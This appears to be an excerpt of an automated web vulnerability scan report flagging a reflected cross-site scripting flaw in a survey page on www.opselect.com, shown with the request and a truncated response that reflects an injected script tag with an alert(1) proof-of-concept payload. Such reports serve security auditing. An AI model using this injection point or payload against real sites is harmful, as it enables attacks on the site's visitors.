1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.opselect.com |
Path: | /ad_feedback/survey.adp |
GET /ad_feedback/survey.adp Host: www.opselect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK MIME-Version: 1.0 Date: Wed, 17 Nov 2010 18:03:37 GMT Server: AOLserver/4.0.10 Content-Type: text/html; charset=iso-8859-1 Content-Length: 7418 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>AOL Ad Feedback</title> <link rel="stylesheet" href="css/default.css" type="text/css"> <meta http-equiv="content ...[SNIP]... <input type='hidden' name='source' value=10198723><script>alert(1)< ...[SNIP]... |